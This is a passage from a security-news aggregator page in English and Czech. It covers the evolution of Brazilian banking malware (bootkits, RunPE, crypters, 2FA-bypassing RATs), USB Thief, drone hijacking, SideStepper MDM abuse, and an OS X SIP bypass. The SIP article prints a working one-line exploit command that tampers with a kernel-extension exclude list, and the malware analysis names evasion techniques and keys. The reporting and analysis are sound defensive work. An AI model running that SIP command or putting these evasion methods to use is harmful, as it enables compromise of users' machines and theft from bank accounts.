The code was pretty simple; it just used the function GetAsyncKeyState in order to check the state of each key and then logged it as necessary. Most of the keyloggers were not using any obfuscation to hide the targets, helping in the identification of such attacks.
Plaintext strings used to detect navigation
Phishing Trojan
After the banks introduced virtual keyboard to their systems, the use of keyloggers was no longer effective. To bypass these protections, the Brazilian bad guys started developing mouselogger malware and later Phishing Trojans.
This type of malware was using DDE (Dynamic Data Exchange) in order to get the current URL opened in the browser; this method still works nowadays, but most of these malicious programs have updated their code to use OLE Automation instead of DDE because it provides more advanced options.
Code using DDE to get URL information
After getting the current URL the malware just checks if the URL is in the target list. If found, the malware would show a phishing screen asking for banking information.
Phishing Trojan being shown inside Internet Explorer
At this time the malware was not using any kind of encryption or encoding – all strings were plaintext making the analysis easier.
Malware strings without any encryption/encoding
The stolen information is then sent to the attacker by email.
Email containing the stolen information
Hosts
In order to steal information without making it easy to identify a phishing Trojan they started redirecting users to malicious web pages by changing the hosts file to resolve the banking domain names to hardcoded servers. In this way, after infection it would be more transparent to the user increasing the chances of a successful attack.
Data written to the hosts file in order to redirect access
Code used to write data to host file
These types of attack were very effective at the time, while not all anti-malware vendors were able to identify and block them. We can still see some samples using host modifications, but they are not so effective anymore.
Anti-rootkit
At this stage they realized that anti-malware solutions and internet banking security plugins were making their work more difficult. They then started to focus their efforts on removing security solutions before running the malicious payload in order to increase the chances of a successful execution and to keep running on the infected machine for much longer.
Nothing could be better than using well known command line tools that already have this capability –and most of them are already whitelisted.
RegRun Partizan
This tool is a Native Executable which runs on system startup before the Win32 subsystem starts up. It is able to delete files and registry keys even if they are protected by Kernel mode drivers, since it is executed before the drivers are loaded to the system. The commands to be executed are specified on the .RRI file as shown below.
Partizan RRI script containing the list of files to remove
The Avenger
A Windows driver designed to remove persistent files and registry keys. The commands to be executed on the system are written to a script that will be read by the driver once it starts.
The Avenger GUI and script to delete security solutions
Gmer
Gmer is a well-known rootkit detector and remover with lots of functions to detect rootkit activities on the system as well as delete files by using its own device driver. As it has a command-line interface, it is easy to remove protected files.
BAT file using GMER’s killfile function to remove security solution
More details about banking Trojans using GMER to uninstall security software can be found in a separate blogpost.
Malicious Bootloader
After using anti-rootkits Brazil’s cybercriminals went deeper and started to develop their own bootloaders, tailored exclusively to remove the security solutions from user’s machine. The downloader is in charge of installing the malicious files and then rebooting the machine. After reboot the malicious bootloader can remove the desired files from the system.
Basically, the malware replaces the original NTLDR, the bootloader for Windows NT-based systems up to Windows XP, to a modified version of GRUB.
Modified GRUB loader acting as NTLDR
This loader will read the menu.lst file that points to the malicious files already installed on the system xp-msantivirus and xp-msclean.
Menu.lst file containing the parameters to execute malicious commands
When executed the malware will remove files related to security solutions and then restore the original NTLDR files that were previously renamed to NTLDR.old.
Commands executed to remove security modules and restore the original NTLDR
What we have nowadays
Automation
Most banks were using machine identification to prevent unauthorized attempts to perform operations using the stolen information. To bypass this the bad guys started performing the malicious operations from the infected machine, by using Internet Explorer Automation (formerly OLE automation) to interact with the page content.
The first samples using this type of attack were Browser Helper Objects (BHOs) that could detect a transfer transaction and then change the destination account, sending the money to the attacker instead of the real destination.
Later, the same method was heavily used in Boleto attacks, where they were using automation to get the inputted barcode and then replace it with the fraudulent one.
Since this method only works for Internet Explorer, the malware needs to force the user to access internet banking via that browser. Therefore, it implements a timer which checks if Firefox or Chrome is being used and then kills the process.
Code to avoid use of Chrome and Firefox
When an instance of IE is found, the malware will search for a tab instance in order to be able to read the window text and then to know which URL is being accessed.
Finding the tab handle and obtaining the URL being accessed
Search for target’s specific titles
As the automation will process the page structure, it needs to know if the victim is on the page to input the Boleto information. It installs a handle to the event OnDocumentComplete in order to collect the full URL as soon as it is loaded and then checks if the user is on the target page.
Search for target’s specific pages
After confirming that the user is on the target page, the malware will process the page structure and install a handler to the submit button, then it can take control of the execution right after the user has submitted the page and then process the inputted content.
Search for a specific textbox and get the inputted data
After collecting the inputted data, it can be processed and then changed to the malicious content before submitting the page.
For those samples we could find, string obfuscation, debugger detection and virtual machine detection as well as this method mean they are not as easy to detect as other attacks involving phishing Trojans and hosts.
Code Obfuscation and RunPE
Looking for new ways to bypass detection, Brazilian criminals started using obfuscation in order to hide the parts of code that perform their main operations.
In the code below the coder has encrypted the original code of the function used to download the malicious payload; on a static analysis you cannot figure out what the purpose of this function is.
Encrypted downloader function
In runtime the malware will call the function to decrypt this code prior to executing it.
Decrypt code call
Decryption routine
As we can see in the code above, the decryption is a simple sub operation using the key 0x42 on the encrypted byte – a simple and fast way to hide parts of code.
Decrypted downloader function
In order to avoid detection by a network firewall, the downloaded file is encrypted using its own encryption function.
Encrypted file
Decrypted file
The encryption function is also hidden by using the same method used in the download function – after decrypting the code we can find a XOR-based encryption combined with a shift-right operation on the XOR key.
After decrypting the file, it will not be executed using the normal methods usually found in malicious code. To hide the process on the machine the malware uses a trick known as RunPE where the code will execute a clean process (like iexplorer.exe or explorer.exe) in a suspended state and then modify its memory content to the malicious code and execute.
Code launching clean process as suspended state
After creating the process in a suspended state the code will write the new code to the memory space, set the new EIP for execution and then resume the thread.
Writing malicious code and resuming the thread
Internet explorer process hosting the malicious file
Since the malicious code is running on the memory space allocated to Internet Explorer, using tools like Process Explorer to verify the publisher signature does not work because they check the signature of the process on the disk.
It was clear that they had moved on completely from using beginner’s code to a much more professional development and we realized it was time to update the analysis process for Brazilian malware. We are sure most of this evolution happened due to contact and the exchange of knowledge with other malware scenes, mostly those in Eastern Europe, which we described in this article.
AutoIt Crypto
AutoIt is now often used as a downloader and crypto for the final payload in order to bypass detection. After being compiled the AutoIt script is encrypted and embedded to the generated binary which makes it necessary to extract the original script before analyzing its code.
Looking for a better way to hide the final payload, the Brazilian cybercriminals have developed a new crypto using AutoIt language where the decrypted payload is executed by using a RunPE technique.
AutoIt Crypto execution flow
The crypto uses two different methods to store the encrypted file: the first one is by using the FileInstall function that already exists on AutoIt, and the other one is embedding the file at the end of the binary.
When using the second method the crypto writes a key which is used to mark where the encrypted payload content starts and is then able to find the content to decrypt. On the sample below, the key used is a short version of “Sei que ganharei 20K” which means “I know that I will win R$ 20,000”.
Key used to mark where the encrypted payload starts
AutoIt Crypto main code
After reading the encrypted payload it decrypts the content using the decryption key “VENCIVINICI” and then executes the malicious payload using RunPE.
The decryption function code is not written in AutoIt – it is written in C language. After being compiled the bytes are included in the code as a string and then mapped to memory and executed by using CallWindowProc API.
Decryption function implementation
We found the following algorithms being implemented as the encryption/compression method for this crypto:
RC4
XXTEA
AES
LZMA
ZLIB
The use of AutoIt for malware development is not something new, but in the middle of 2014 we saw a wave of attacks using AutoIt in Brazil, as we can see on the graph below.
Trojan.Win32.Autoit: number of users attacked in Brazil
MSIL Database
Another type of malware that emerged recently was malware developed in .NET instead of Visual Basic 6.0 and Delphi, following a trend we saw worldwide. It is not hard to find a downloader written in .NET. Anyway, some samples of Trojan-Banker.MSIL.Lanima grabbed our attention when we found some of them were not using functions commonly used to download the payload.
Download function
As we can see in the picture above this samples does not use any download function because it uses SQL Server to host the binary content and then just uses an SQL command to retrieve the content and save to disk.
The strings are encoded with base64 and encrypted with Triple DES algorithm in order to hide the text related to the main actions of the malware.
Decrypt function
This family of malware is very prevalent in Brazil and China:
MSIL Crypto
Following the same method used by AutoIt Crypto the bad guys developed another crypto, this time using .NET language. The process to extract the real executable is almost the same as AutoIt Crypto but it has an intermediate module which is responsible for extracting the final payload.
Looking at the main module we have a .NET code and the main function of this main module is to extract and load the embedded DLL.
.NET Crypto execution flow
Crypto main function
As we can see, the function above will split the binary content by using the separator string “cdpapxalZZZsssAAA” and use the second block which contains the encrypted code of the Loader DLL.
Loader DLL encrypted content
Then it is time to decrypt it by calling the function named “fantasma” (or “ghost” in English), the official name used for this crypto in the forums is PolyRevDecrypt which is basically an XOR operation between the encrypted byte, the last byte of the encrypted buffer and one byte of the password provided to the function.
Decryption function
After being decrypted, the code will be loaded and executed by the function “docinho” (or “candy” in English).
Function to load and execute the DLL
The code of the library is almost the same as the main executable except that now it will use the second block of the split content.
Loader DLL main function
RAT
In a bid to reduce the losses related to cyber attacks, banks implemented two-factor authentication using a hardware token and SMS token for online banking transactions in addition to the solutions already in place like machine identification. To solve this problem the cybercriminals have created a remote administration tool specially developed to request the information required to process internet banking transactions.
RAT execution flow
The browser watcher will monitor the user browser and see if any of the target banks are accessed; if they are, it will decompress and execute the RAT Client and notify the C&C about the new infection.
Internet banking access monitoring
The strings used by this malware are encrypted using their own encryption routine. After decrypting it we are able to identify the targets as well as the important parts of the code.
Decrypted strings
For this type of infection it is common for the bad guys to create a way to manage the attacks. Here we can see the number of computers infected on the same day, keeping in mind that this number means the amount of users that have accessed internet banking while the malware was running on their computer.
C&C panel showing the list of infected users
The RAT Client will connect to the server to alert the attacker that a new victim is accessing the internet banking system. It is then possible to execute the attack in real time.
RAT Server showing a new victim is connected
At this stage the attacker just needs to wait for the user to login and then proceed with the attack. When the user is already logged in, the attacker can see the user screen, lock it and control the execution as well as ask for specific information that will help him to steal the account, like:
Token
Access card code
Date of birth
Account password
Internet banking password
Electronic signature
To prevent the user from seeing that the computer is being remotely controlled, this RAT has a function that simulates an update for the bank security plugin showing a progress bar and disabling all user interactions. Meanwhile, the attacker can perform the banking operations by using the active browser section because the overlay screen is not shown to the attacker.
Lock screen simulating an update
If some information is requested to confirm the transaction, e.g. SMS token, the attacker can ask the victim who will think the information is necessary in order to proceed with the update process.
Screen asking for token code
As soon as the user provides the information, the attacker can enter it on the internet banking screen, bypassing the 2FA used in the transaction.
Information received from the victim
Ransomware
Brazilian cybercriminals not only work with banking malware – they are also exploring other types of attacks involving ransomware. Some years ago, we found TorLocker which contains details inside the malware code suggesting that the developer is from Brazil.
Code containing some strings suggesting the author is from Brazil
As we can see in the image above, we found the sentence highlighted in blue: “Filho de Umbanda não cai!” (“Umbanda’s son never falls down”). Umbanda is an unorthodox religion in Brazil. The name marked in red is the nickname of the author and it also uses the extension .d74 for the encrypted files. This user is very active on underground forums looking for malicious services in Brazil.
We also found other references, like the use of a service in Brazil to get the victim IP in order to notify about an infection.
Request to a Brazilian service to obtain the victim IP
Some months ago, we found another ransomware program based on the Hidden Tear source code that was modified to target Brazilian users, differing from the initial program that was found targeting English- and Japanese-speaking users.
Victim’s machine showing messages in Portuguese, asking to pay in order to receive the files
Why they evolve
We have sufficient evidence that Brazilian criminals are cooperating with the Eastern European gangs involved with ZeuS, SpyEye and other malware created in the region. This collaboration directly affects the quality and threat level of local Brazilian malware, as its authors are adding new techniques to their creations and getting inspiration to copy some of the features used in the malware originating from Eastern Europe. Brazilian cybercriminals are not only developing the quality of their code but also using the cybercrime infrastructure from abroad.
We saw the first sign of this ‘partnership’ in the development of malware using malicious PAC scripts. This technique was heavily exploited by Brazilian malware starting in 2011 and was later adopted by Russian banking Trojan Capper. This cooperation continued as Brazilian criminals started to use the infrastructure of banking Trojans from Eastern Europe – the Trojan-Downloader.Win32.Crishi was the first to use DGA domains hosted at bulletproof companies from Ukraine. Also the Boleto malware adopted the massive usage of fast flux domains, aiming to avoid the takedown of C2s – we saw that with the “bagaça” (bagasse in Portuguese) domains, registered using anonymous services, which hosted crimeware and boleto stuff and was resolving different IPs for every request.
The “bagaça” domains: fast flux and bulletproof from Eastern Europe
Other strong signs of their cooperation are the constant presence of Brazilian cybercriminals on Russian or Eastern European underground forums. It’s not unusual to find Brazilian criminals on Russian underground forums looking for samples, buying new crimeware and ATM/PoS malware, or negotiating and offering their services. The results of this cooperation can be seen in the development of new techniques adopted in Brazilian malware.
The Brazilian malicious author of TorLocker negotiating in a Russian underground forum
These facts show how Brazilian cybercriminals are adopting new techniques as a result of collaboration with their European counterparts. We believe this is only the tip of the iceberg, as this kind of exchange tends to increase over the years as Brazilian crime develops and looks for new ways to attack businesses and regular people.
Conclusion
Cybercrime in Brazil has changed drastically in the last few years, as it shifted from simple keyloggers built from public source code to tailored remote administration tools that can run a complete attack by using the victim machine.
Malware that used to show a phishing screen as soon as it was executed is now completely reactive and waits for a valid session in order to start the job.
That means that the criminals are investing much more money and time in order to develop their malicious code, enhancing anti-debugging techniques and then running the malware undetected for much longer.
As we know, they are in touch with cybercriminals from Eastern Europe, mainly Russians, where they exchange information, malware source code and services that will be used in Brazilian attacks. We can see that many of the attacks used in Brazil were first seen in Russian malware as well as Brazilian techniques later being used in Russian attacks.
Based on that, we can expect to find Brazilian malware with enhanced code obfuscations, anti-debugging tricks, encryption algorithms and secure communications making our work much harder than now.
Bezpečnostní experti varují před zlodějským virem. K šíření nepotřebuje internet
1.4.2016 Viry
Nový škodlivý virus, který krade uživatelská data, odhalili bezpečnostní experti antivirové společnosti Eset. Nezvaný návštěvník dostal přezdívku USB Thief, protože se šíří především prostřednictvím flashek a externích pevných disků. Nakazit tak dokáže i stroje, které nejsou připojeny k internetu. Útočník jim jednoduše infikované médium podstrčí.
Nový nezvaný návštěvník se nejčastěji šíří přes USB flashky a externí disky.
USB Thief potřebuje pro svou „špinavou“ práci pouze pár volných megabajtů na výměnném médiu, které se připojuje k počítači prostřednictvím USB portu. Na něm pak číhá do doby, než bude moci napadnout nějaký počítač.
Snaží se tedy zůstat co možná nejdéle maskován, aby minimalizoval riziko odhalení. Zajímavé je, že se po připojení k počítači automaticky nespustí, jako tomu bývá zpravidla o podobných škodlivých kódů.
Společně s neškodnými programy vpustí do počítače virus USB Thief.
Místo toho se naváže na tzv. portable aplikace, které často bývají uloženy právě na flashkách a externích pevných discích. Jde v podstatě o programy, které se nemusejí instalovat – spouští se přímo z USB médií.
Uživatelé je zpravidla používají na počítačích, kde nemají oprávnění k instalování aplikací. Tím, že portable aplikace nepotřebují instalovat, mohou lidé snadno obejít restrikce administrátorů, typicky na počítačích v kanceláři. Jenže společně s neškodnými programy vpustí do počítače virus USB Thief.
Antiviry jsou prý bezradné
Ten pak automaticky začne z připojeného PC krást data a ukládat je v zašifrované podobě na externí disk. Vzhledem k tomu, jak nezvaný návštěvník opatrně pracuje, většina antivirových programů má problémy s jeho identifikací. Jeho případné odhalení zkrátka není vůbec snadné.
Aby se útočník k datům dostal, musí získat flashku nebo externí disk zase zpět. USB Thief tak nejčastěji šíří počítačoví piráti, kteří své oběti podstrčí infikované médium. Uživatelé by tak měli být ostražití před používáním USB úložišť, jejichž původ je pochybný. Tím výrazně minimalizují riziko, že je nový virus připraví o jejich data.
Je pravděpodobně ale jen otázkou času, než se začne šířit sofistikovanější obdoba tohoto záškodníka, která se také bude šířit přes USB média, ale nashromážděná data bude schopná posílat zpět útočníkovi i přes internet. Pak už útočník nebude potřebovat dostat médium zpět, ale bude jen čekat, až mu virus naservíruje uživatelská data jak na zlatém podnose i na dálku.
Hacker Hijacks a Police Drone from 2 Km Away with $40 Kit
1.4.2016
A researcher has demonstrated how easy it is to steal high-end drones, commonly deployed by government agencies and police forces, from 2 kilometres away with the help of less than $40 worth of hardware.
The attack was developed by IBM security researcher Nils Rodday, who recently presented his findings at Black Hat Asia 2016.
Hacking the $28,463 Drone with Less than $40 of Hardware
Rodday explained how security vulnerabilities in a drone's radio connection could leverage an attacker (with some basic knowledge of radio communications) to hijack the US$28,463 quadcopters with less than $40 of hardware.
Rodday discovered (PPT) two security flaws in the tested drone that gave him the ability to hack the device in seconds.
First, the connection between drone's controller module, known as telemetry box, and a user’s tablet uses extremely vulnerable 'WEP' (Wired-Equivalent Privacy) encryption – a protocol long known to be 'crackable in seconds.'
Also Read: Police Training Eagles to Take Down Rogue Drones
This flaw could be exploited by any attacker in Wi-Fi range of 100 meters to break into that connection and send a malicious command that disconnects the drone's owner of the network.
Second, the onboard chips used for communication between that telemetry module and the drone uses even less-secured radio protocol.
Hijacking Drones from 2 Kms Away
Hacker Hijacks a Police Drone from 2 Km Away
The module and drone communicate using 'Xbee' chip, created by the Minnesota-based chipmaker Digi International and is commonly used in unmanned aerial vehicles (UAVs) everywhere.
According to Rodday, Xbee chips do have built-in encryption capabilities, but for avoiding latency between the drone and the user's commands, the chips doesn't implement encryption.
This issue leaves the drones open to 'Man-in-the-Middle' (MitM) attacks, leveraging an attacker to intercept everything happening on the UAVs network connection and inject commands between the drone and the telemetry box from up to 2 kilometres away.
Also Read: Anti-Drone Weapon that Shoots Down UAVs with Radio Waves
Furthermore, Rodday also warned that any sophisticated hacker with the ability to reverse engineer the drone's software would be able to send navigational controls, block all commands from the real operator, or even crash it to the ground.
Rodday's research proves that there are critical issues with what's likely the most expensive drone yet, as well as one that is used for more serious purposes than high-altitude selfies, which needs to be considered seriously.
The dangerous interaction between Russian and Brazilian cyber criminal underground
1.4.2016 Hacking
Kaspersky has analyzed the interaction between the Russian and Brazilian criminal underground communities revealing a dangerous interaction.
In the past weeks, we have analyzed the evolution of cyber criminal communities worldwide, focusing on illicit activities in the Deep Web. To simplify the approach we have considered the principal cyber criminal communities (Russia, Brazil, North America, Japan, China, Germany) as separated entities, instead, these ecosystems interact each other in a way that Kaspersky experts have analyzed.
Experts from Kaspersky Lab have analyzed the interaction between the Russian and Brazilian criminal communities, a dangerous interaction that is leading to a rapid evolution of hacking tools.
The experts at Kaspersky Lab demonstrated that Brazilian and Russian-speaking criminals have an intense cooperation, Brazilian criminals use to buy malware samples from the Russian peers operating the principal underground forums. Typically they pay for exploit kits, ATM or PoS malware and also hacking services.
The first example of collaboration is dated back 2011, when Brazilian cyber criminals have been actively abusing malicious PAC scripts to redirect victims to phishing pages. A few months later, cyber criminals behind the Russian banking Trojan Capper adopted the same technique.
“We saw the first sign of this ‘partnership’ in the development of malware using malicious PAC scripts. This technique was heavily exploited by Brazilian malware starting in 2011 and was later adopted by Russian banking Trojan Capper. ” states the analysis published by Kaspersky.
The experts highlight that cooperation runs both ways, helping to speed up the growth of hacking capabilities of both communities and also malware evolution.
“As we know, they are in touch with cybercriminals from Eastern Europe, mainly Russians, where they exchange information, malware source code and services that will be used in Brazilian attacks. We can see that many of the attacks used in Brazil were first seen in Russian malware as well as Brazilian techniques later being used in Russian attacks.” continues Kaspersky.
The researchers collected evidence of the profitable collaboration, in one discussion thread on an underground forum frequented by Russian hackers a user behind the moniker “Doisti74” expressed his interest in buying compromised machines located in Brazil. The same user is present in the Brazilian underground scene and researchers believe he could be interested in launching malware-based campaign in Brazil.
Brazilian crooks are looking with increasing interest at ransomware, some years ago experts at Kaspersky discovered the threat TorLocker developed by Brazilian malware developers. Some months ago, Kaspersky has spotted another ransomware based on the Hidden Tear source code that was adapted to target Brazilian users.
Crooks belonging to the two criminal underground communities also use to share malicious infrastructure, this is the case of a number of Boleto malware campaigns observed in Brazil that were relying on the same infrastructure used months before by operators behind the Russian banking Trojan family (Crishi).
The researchers have illustrated in details numerous evidence they collected related to the collaboration between Russian and Brazilian hackers, the experts highlighted that Brazilian banking malware has rapidly evolved in the last years thanks to this interaction.
“Just a few years ago, Brazilian banking malware was very basic and easy to detect,” said Thiago Marques, security researcher at Kaspersky Lab.
“With time, however, the malware authors have adopted multiple techniques to avoid detection, including code obfuscation, root and bootkit functions and so on, making their malware much more sophisticated and harder to combat.
“This is thanks to malicious technologies developed by Russian-speaking criminals. And this cooperation works both ways.”
I have no doubt, cybercrime has no boundaries and this kind of interaction will reinforce the principal criminal underground communities.
Do hackers have hacked election to make Peña Nieto President?
1.4.2016 Hacking
A Columbian hacker claims he helped the candidate Enrique Peña Nieto in winning the Mexican presidential election in 2012.
Until now we have seen something of similar only in the TV series, but the reality could overwhelm the fiction because a Columbian hacker claims he helped Enrique Peña Nieto in winning Mexican presidential election.
The hacker named Andrés Sepúlveda revealed to have operated in a team with peers to install a malware to monitor opponents during the 2012 campaign as part of a hacking campaign codenamed ‘black propaganda.’
The hackers helped Enrique Peña Nieto win Mexico’s 2012 presidential election, they manipulated the event it in nine countries across Latin America. The hackers have installed malware with the intent to spy on target machines and steal data, they also used a botnet to manage PSYOPs on the social media trying to influence the final decision of the voters.
Enrique Pena Nieto
The hacker, who is currently serving a 10-year prison sentence for hacking crimes related to Colombia’s 2014 presidential election, released an interview to Bloomberg explaining that he was hired by the Miami-based political consultant Juan José Rendón.
“My job was to do actions of dirty war and psychological operations, black propaganda, rumors—the whole dark side of politics that nobody knows exists but everyone can see” the man told to Bloomberg.
Sepúlveda added that his primary motivation was political, he hacked in opposition to what he defined “dictatorships and socialists governments.”
The political consultant Juan José Rendón denied to have hired Sepúlveda for illegal activities and confirmed that he paid him in 2005 for the development of a web site.
“He is delusional,” Rendón said in a phone call. “All the things he describes are exactly like the TV show Mr Robot.”
“Can you really change the will of the people through social networks? Maybe in Ukraine or Syria where there is no alternatives. But here (in the Americas) where there is TV, a free press and door to door campaigns, it is not so influential,” he added.
Sepúlveda confirmed to have had a $600,000 budget to undermine the presidential campaigns Nieto’s opponents, Josefina Vázquez Mota and Andrés Manuel López Obrador.
The hacker team compromised computers at the headquarters of the two candidates in order to monitor communications and exfiltrate sensitive data, including speech drafts and campaign schedules.
They also managed a PSYOP through the principal social networks by using a multitude of fake Twitter accounts to fuel the public debate on the Peña Nieto’s political plan and discrediting his rivals, all these accounts were carefully managed in a way to appear legitimate.
“He wrote a software program, now called Social Media Predator, to manage and direct a virtual army of fake Twitter accounts. The software let him quickly change names, profile pictures, and biographies to fit any need. Eventually, he discovered, he could manipulate the public debate as easily as moving pieces on a chessboard—or, as he puts it, “When I realized that people believe what the Internet says more than reality, I discovered that I had the power to make people believe almost anything.”” reported Bloomberg.
Sepúlveda confirmed to have used a strategy similar to the ‘black propaganda’ in order to influence the opinion of voters in other elections in several countries, including Venezuela, Nicaragua, Panama, Honduras, El Salvador, Colombia, Costa Rica and Guatemala.
Unfortunately, the man has destroyed most of the evidence of his support to the politic candidates in various presidential campaigns.
Which is the Peña Nieto’s position?
The Office of the President issued the following statement:
“We reject any relationship between the 2012 presidential campaign team and Andrés Sepúlveda or that there was a contract with the consultant J.J. Rendón.”
Just One? No, FBI to Unlock More iPhones with its Secret Technique
1.4.2016 Apple
The Federal Bureau of Investigation (FBI) worked with Israeli mobile forensic firm Cellebrite to unlock iPhone used in the San Bernardino shooting last year, confirmed by multiple sources familiar with the matter.
The United States Department of Justice (DoJ) said on Tuesday that the FBI successfully unlocked iPhone and accessed data with the help of an undisclosed alternative method offered by a third party and that it no longer needs Apple's assistance.
Apple was engaged in a legal encryption battle with the DoJ for a month over a court order that forces the company to write new software, which could disable passcode protection on Farook's iPhone 5C to help them access data on it.
Apple refused to comply with the order, saying the FBI wants the company to create the "software equivalent of cancer" that would likely threaten the privacy and data security of millions of its iPhone users.
FBI to Unlock iPhone in Several Pending Cases
Although the legal battle between the FBI and Apple is over, the 'encryption vs. national security' drama is still ongoing.
Apple to FBI: Reveal Your Secret Technique
Apple asked the FBI to share its exploit that bypassed the iPhone security protections, but the agency, which has already been frustrated in convincing Apple to help it access data on just one iPhone, might prefer to keep its technique secret.
Now, when the FBI itself owns a cancerous software, the agency would most likely use it to resolve several pending court cases in which the Feds were seeking Apple's assistance to access information from a locked iPhone.
Yes, the FBI is keeping its technique secret… but only from Apple and not from other law enforcement agencies seeking details on the method to access locked iPhones involved in criminal cases.
Currently, there are two separate court cases, one in Arkansas and the other in Brooklyn, seeking help from the FBI.
Case 1: Reportedly, the FBI agreed to help the Police in Arkansas in the homicide case by unlocking an iPhone and iPod belonging to two teens accused of killing a couple.
Case 2: In the Brooklyn case, an iPhone 5S was seized in the course of a drug investigation, which runs iOS 7. The DoJ will disclose by April 11 as to whether it would "modify" its own request for Apple's assistance in this case or will unlock itself.
Apple's Biggest Problem: How FBI hacked its iPhone
It's still a question, but since the agency so desperately wanted an iPhone backdoor, it seems that it will not share with Apple after having one.
Apple is now in the uncomfortable position as the company knows that a critical vulnerability exists in its operating system, but don't know what it is.
The situation becomes serious for Apple where the company knows the FBI has no legal obligation to disclose how it broke the iPhone's security.
However, the government could argue the technique is bound by a non-disclosure agreement with the third party that unlocked the iPhone.
Though it's not just Apple who had been approached several times to help Feds unlock iPhone, Google had also been asked, at least, nine times to help federal agencies hack into locked Android smartphone citing the All Writs Act.
SideStepper method allows to infect iOS devices via MDM Solutions
1.4.2016 Apple
SideStepper is a method to install malicious apps on iOS devices by abusing the mobile device management (MDM) solutions.
Security researchers from the Check Point firm have devised a method to install a malicious code on iOS devices by abusing the mobile device management (MDM) solutions used by many enterprises.
The technique relies on a vulnerability dubbed by the experts SideStepper, but that Apple considers it as a normal behavior.
“SideStepper is a vulnerability that allows an attacker to circumvent security enhancements in iOS 9 meant to protect users from installing malicious enterprise apps. These enhancements require the user to take several steps in device settings to trust an enterprise developer certificate, making it harder to install a malicious app accidentally.” state the blog post published by Check Point.
Apple allows enterprises to distribute internally-used apps through a Developer Enterprise Program instead passing through the App Store. In order to install the apps, enterprises need to use certificates signed by Apple.
The program allows organizations to install internal apps on employee devices using enterprise certificates signed by Apple.
However, hackers have abused in several circumstances of digital certificates so Apple introduced new security enhancements in iOS 9.
“These enhancements require the user to take several steps in device settings to trust an enterprise developer certificate, making it harder to install a malicious app accidentally.” States the CheckPoint firm.
SideStepper technique
MDM solutions are used by enterprises to easily manage mobile devices used by employees. MDM allows the easy management of any aspect of the mobile devices, including installing apps, deployment of security policies, and remotely wipe phones.
Experts at CheckPoint firm highlighted that threat actors can launch a man-in-the-middle (MitM) attack against the MDM solution to allow the installation of malicious enterprise apps over-the-air, this is possible because Apple gives apps installed using MDMs the possibility to bypass security measures.
Malicious MDM-distributed apps can be abused by using the following process:
Install a malicious iOS configuration profile. This is a native way to distribute a set of configuration settings like networking, security settings, root CAs, and more. A threat actor can craft a configuration profile that will install a root CA and route traffic through a VPN or a proxy to a malicious server, and then initiate a MitM attack. This configuration could be deployed using phishing attack.
Set up a remote enterprise app server to serve the malicious app.
Wait for a command to be sent to an iOS device by an MDM: then, using a MitM attack, intercept and replace the command with a request to install a malicious app. The iOS device will fetch from the remote enterprise app server and install it.
Execute commands using the malicious enterprise app which, because of the method used to install it, does not require explicit user trust. This means that users will not be able to distinguish between a legitimate enterprise app, an App Store app, or a bogus app installed by a threat actor.
Basically, the attackers could intercept the command sent by the MDM to the devices and replace it with a request to install a malicious app. The operation doesn’t need user’s interaction making hard to discover the attack.
The SideStepper technique could be used to infect Apple devices and control them with a malicious code.
CheckPoint suggests enterprises to carefully assess the risk of malicious applications on mobile devices.
Experts from CheckPoint will present the SideStepper method at the Black Hat Asia conference Today.
The code to bypass Apple System Integrity Protection security mechanism fits in a Tweet
31.3.2016 Apple
Apple failed in fixing the System Integrity Protection security mechanism and the exploits code released by a researcher fits in a Tweet .
Last week security media reported a critical privilege escalation flaw (CVE-2016-1757) in the Apple System Integrity Protection (SIP) security mechanism, a vulnerability that was present at the time of the discovery in all the version of the OS X operating system.
This week, Apple issued a security update of OS X El Capitan 10.11.4 and iOS 9.3 to solve the problem, but according to the experts is was ineffective in fixing the privilege escalation vulnerability.
The flaw was discovered by the security researcher Pedro Vilaça from SentinelOne and exposes more than 130 Million Apple customers at risk of hack. The attackers can exploit the flaw for various purposes, for example, the vulnerability could be exploited in a multi-stage attack in which crooks have already compromised the target system and use the flaw to gain persistence on compromised devices.
The SIP is a security mechanism implemented by Apple in the OS X El Capitan operating system for the protection of certain system processes, files and folders from being modified or tampered with by other processes, even when they are executed by a user with root privileges.
System Integrity Protection SIP bypass OS X El Capitan
According to the experts at SentinelOne the flaw allows circumventing the SIP technology bypassing the key security feature without kernel exploits. Now Apple issued a security patch for both OS X El Capitan 10.11.4 and iOS 9.3, but it seems that the update is ineffective, causing the users’ disappointment.
The critical privilege escalation vulnerability in the System Integrity Protection still affects the most recent version of OS for both Macs and iThings.
The popular researcher Stefan Esser, has published a new exploit code to bypass latest patched version of the System Integrity Protection application, and the interesting part is the dimension of the code that fits in a Tweet.
You’ve heard it right, according to the Esser this isn’t the unique flaw affecting the SIP, and most of them are still unfixed.
“Stefan Esser of German security biz SektionEins also gave a talk at this year’s SyScan360 during which he highlighted a bunch of SIP-related vulnerabilities. Esser told The Register “everything in my slides is unfixed” by Apple in the latest version of OS X 10.11 except for two flaws: the kas_info syscall and a malicious mount.” reported El Reg.
“The evil mount worked by mounting a file system over /System and replacing supposedly SIP-protected core OS utilities with attacker-controlled ones (yes, that really worked). It was fixed in OS X 10.11.2. “
ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
The above code expands to:
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
Reboot
Let’s hope Apple would fix all the open SIP issues as soon as possible.
Nebezpečná chyba v operačním systému iOS ohrožuje milióny uživatelů
31.3.2016 Zranitelnosti
Bezpečnostní analytici společnosti Check Point odhalili novou vážnou zranitelnost v operačním systému iOS od společnosti Apple, který využívají chytré telefony iPhone i počítačové tablety iPad. Chybu mohou útočníci zneužít k tomu, aby na napadené zařízení propašovali prakticky jakýkoliv škodlivý kód.
Chyba dostala pracovní název SideStepper. Útočníkům umožňuje zneužít komunikaci mezi jablečným telefonem nebo tabletem a tzv. MDM systémem. Jde v podstatě o řešení, které je především ve firmách využíváno pro vzdálenou instalaci aplikací a správu zařízení Apple.
Právě kvůli chybě v této komunikaci si útočníci s napadeným přístrojem mohou dělat, co je napadne. „Útočníci mohou zranitelnost zneužít například ke vzdálené instalaci škodlivých aplikací a ohrozit veškerá data v zařízení. Potenciálně tak mohou být ohroženy milióny iOS uživatelů po celém světě," řekl pro Novinky.cz David Řeháček, bezpečnostní odborník ze společnosti Check Point Software Technologies.
Útočí přes SMS i sociální sítě
